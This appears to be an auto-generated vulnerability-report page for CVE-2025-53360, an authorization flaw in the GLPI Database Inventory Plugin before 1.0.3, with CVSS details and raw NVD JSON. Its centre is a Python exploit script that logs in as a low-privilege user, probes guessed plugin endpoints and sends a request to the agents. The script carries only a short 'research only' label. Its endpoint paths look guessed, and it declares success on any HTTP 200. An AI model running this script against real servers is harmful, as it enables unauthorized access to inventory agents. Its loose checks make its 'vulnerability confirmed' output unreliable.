Security Vulnerability Report
中文
CVE-2025-53360 CVSS 4.3 MEDIUM

CVE-2025-53360

Published: 2025-11-18 17:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

pluginsGLPI's Database Inventory Plugin "manages" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. In versions prior to 1.0.3, any authenticated user could send requests to agents. This issue has been patched in version 1.0.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

pluginsGLPI Database Inventory Plugin < 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-53360 PoC - pluginsGLPI Database Inventory Plugin Unauthorized Agent Access # Target: pluginsGLPI with Database Inventory Plugin < 1.0.3 def exploit_cve_2025_53360(target_url, username, password): """ This PoC demonstrates the authentication bypass vulnerability in pluginsGLPI Database Inventory Plugin. Any authenticated user can send requests to agents without proper authorization checks. """ session = requests.Session() # Step 1: Login to GLPI with low-privilege user login_url = f"{target_url}/front/login.php" login_data = { 'username': username, 'password': password, 'auth': 'local', 'submit': 'Login' } try: response = session.post(login_url, data=login_data, timeout=10) if 'GLPI' not in response.text and response.status_code != 200: print("[-] Login failed") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Access agent management endpoint (unauthorized) # This should be restricted but isn't in vulnerable versions agent_endpoints = [ '/ajax/plugin.databaseinventory.php', '/front/plugin.databaseinventory.agent.php', '/api/plugin/databaseinventory/agent/' ] for endpoint in agent_endpoints: url = f"{target_url}{endpoint}" try: response = session.get(url, timeout=10) # Check if we can access agent data without proper permissions if response.status_code == 200: print(f"[+] Successfully accessed {endpoint}") print(f"[+] Response indicates unauthorized access possible") print(f"[+] Status Code: {response.status_code}") except requests.RequestException as e: print(f"[-] Request to {endpoint} failed: {e}") # Step 3: Send malicious request to agent malicious_url = f"{target_url}/ajax/plugin.databaseinventory.php" payload = { 'action': 'getAgentStatus', 'agent_id': '1' } response = session.post(malicious_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Malicious request accepted by vulnerable endpoint") print("[+] Vulnerability confirmed - unauthorized agent access possible") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://localhost/glpi user pass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] print("[*] CVE-2025-53360 PoC - pluginsGLPI Database Inventory Plugin") print("[*] Vulnerability: Improper Authorization in Agent Management") print("-" * 60) exploit_cve_2025_53360(target, user, passwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53360", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:02.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "pluginsGLPI's Database Inventory Plugin \"manages\" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. In versions prior to 1.0.3, any authenticated user could send requests to agents. This issue has been patched in version 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/pluginsGLPI/databaseinventory/commit/0a376a0c6f4142e11ea518faefe95c01b176fd87", "source": "[email protected]"}, {"url": "https://github.com/pluginsGLPI/databaseinventory/commit/7dcad1efb6ee84e9cffb3b446cdb47dc0be1091e", "source": "[email protected]"}, {"url": "https://github.com/pluginsGLPI/databaseinventory/commit/e9d4474acdab4141a6f4798cdd406b0d04480269", "source": "[email protected]"}, {"url": "https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-5j5j-xr62-jr58", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.